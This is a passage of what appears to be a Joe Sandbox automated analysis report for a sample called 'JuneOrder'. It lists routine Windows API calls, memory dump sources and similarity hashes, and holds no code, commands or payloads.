                                        • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                                        • DestroyWindow.USER32(?), ref: 00408F3D
                                        • UnregisterClassW.USER32 ref: 00408F53
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                                        • String ID:
                                        • API String ID: 2895088630-0
                                        • Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                        • Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
                                        • Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                        • Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58
                                        APIs
                                        • EnumWindows.USER32(00409507,?), ref: 0040959B
                                        • GetCurrentThreadId.KERNEL32 ref: 004095B3
                                        • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                                        • GetCurrentThreadId.KERNEL32 ref: 004095EF
                                        • EnableWindow.USER32(?,00000001), ref: 00409605
                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Window$CurrentThread$EnableEnumWindows
                                        • String ID:
                                        • API String ID: 2527101397-0
                                        • Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                        • Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
                                        • Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                        • Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18
                                        APIs
                                        • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
                                        • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
                                        • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
                                        • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocValue$Heap
                                        • String ID:
                                        • API String ID: 2472784365-0
                                        • Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                        • Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
                                        • Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                        • Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC
                                        APIs
                                        • UnregisterWait.KERNEL32(?), ref: 0041200E
                                        • CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
                                        • EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
                                        • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
                                        • HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                        • String ID:
                                        • API String ID: 4204870694-0
                                        • Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                        • Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
                                        • Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                        • Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8
                                        APIs
                                        • wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                                        • memmove.MSVCRT ref: 004058E1
                                        • wcsncpy.MSVCRT ref: 004058F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: memmovewcsncmpwcsncpy
                                        • String ID: $0A$$0A
                                        • API String ID: 1452150355-167650565
                                        • Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                        • Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
                                        • Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                        • Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA
                                        APIs
                                        • memset.MSVCRT ref: 00405562
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcmemset
                                        • String ID: RtlGetVersion$ntdll.dll
                                        • API String ID: 3137504439-1489217083
                                        • Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                        • Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
                                        • Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                        • Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD
                                        APIs
                                        • wcslen.MSVCRT ref: 0040A0AB
                                        • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
                                        • wcscpy.MSVCRT ref: 0040A0CC
                                        • memset.MSVCRT ref: 0040A0FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocHeapmemsetwcscpywcslen
                                        • String ID: $0A
                                        • API String ID: 1807340688-513306843
                                        • Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                        • Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
                                        • Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                        • Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A
                                        APIs
                                          • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                          • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                          • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                          • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                        • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                        • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                        • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Heap$Free$Alloc
                                        • String ID: $0A
                                        • API String ID: 3901518246-513306843
                                        • Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                        • Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
                                        • Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                        • Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02259F70), ref: 004054AB
                                        • EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                        • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                        • CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                          • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                        • LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3708593966-0
                                        • Opcode ID: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                        • Instruction ID: 0c8983fff82f944e714e95dc609c427016460782395ad7ea9b381996daa8850a
                                        • Opcode Fuzzy Hash: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                        • Instruction Fuzzy Hash: 6E110632145604BFC3015F54EC05ED7BBB9EF45752721846BF800972A0EB75A8508F6D
                                        APIs
                                        • EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                        • LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                          • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                        • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                        • String ID:
                                        • API String ID: 3171405041-0
                                        • Opcode ID: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                                        • Instruction ID: 8e0b58a532cd0764c064264ab0afec864f9344a56e81b99afb7742a3bcd9c4dc
                                        • Opcode Fuzzy Hash: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                                        • Instruction Fuzzy Hash: 80112B71501601AFC7209F55DC48B96BBB5FF49311F10843EA45A936A1D738A844CF98
                                        APIs
                                          • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                          • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02250000,00000000,?,?), ref: 0040E2C7
                                        • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                        • wcscmp.MSVCRT ref: 004096C2
                                        • memmove.MSVCRT ref: 004096DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocFileHeapModuleNameValuememmovewcscmp
                                        • String ID: \\?\
                                        • API String ID: 3734239354-4282027825
                                        • Opcode ID: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                                        • Instruction ID: 273bc576c06434c2caee33e7ea90b93358419674725e30c46c8a7bea9ec705d9
                                        • Opcode Fuzzy Hash: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                                        • Instruction Fuzzy Hash: BBF0E2B31006017BC210677BDC85CAB7EACEB853747000A3FF515D24D2EA38D82496B8
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                                        • Instruction ID: 0935afcf37e6329c3ac2d0f56793f6a9f9fc9668031c2f15978d8007e640a3dc
                                        • Opcode Fuzzy Hash: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                                        • Instruction Fuzzy Hash: 322103317506083BE524AA29DC86F9F738CDB81708F40063EF241BA2C1CA79E54947AE
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocHeapwcsncpy
                                        • String ID:
                                        • API String ID: 2304708654-0
                                        • Opcode ID: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                                        • Instruction ID: a3f43ae3cc8438659badc3904afd778ac5f48c872593279c616423bb3bd2bb8e
                                        • Opcode Fuzzy Hash: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                                        • Instruction Fuzzy Hash: 6D51AD34508B059BDB209F28D844A6B77F4FF84348F544A2EF885A72D0E778E915CB99
                                        APIs
                                        • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
                                        • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
                                        • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
                                        • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CharLower
                                        • String ID:
                                        • API String ID: 1615517891-0
                                        • Opcode ID: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                        • Instruction ID: 50cff0fc212774e4e1f85142edc8b720228546f3e888a8e5f893537154114361
                                        • Opcode Fuzzy Hash: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                        • Instruction Fuzzy Hash: 582176796043058BC710AF1D9C40077B7E4EB80364F86483BEC85A3380D639EE169BA9
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
                                        • malloc.MSVCRT ref: 00412281
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
                                        • malloc.MSVCRT ref: 004122B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidemalloc
                                        • String ID:
                                        • API String ID: 2735977093-0
                                        • Opcode ID: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                        • Instruction ID: 3c1085fe75aa08d7dfcf325d5fd6ce3d1ff6e0efa089dc1519f7c1eb2db8e9d3
                                        • Opcode Fuzzy Hash: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                        • Instruction Fuzzy Hash: F70145373413013BE2204685AC02FAB3B58CBC1B95F1900BAFF04AE6C0C6F3A80182B8
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
                                        • malloc.MSVCRT ref: 004121E4
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
                                        • malloc.MSVCRT ref: 00412216
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
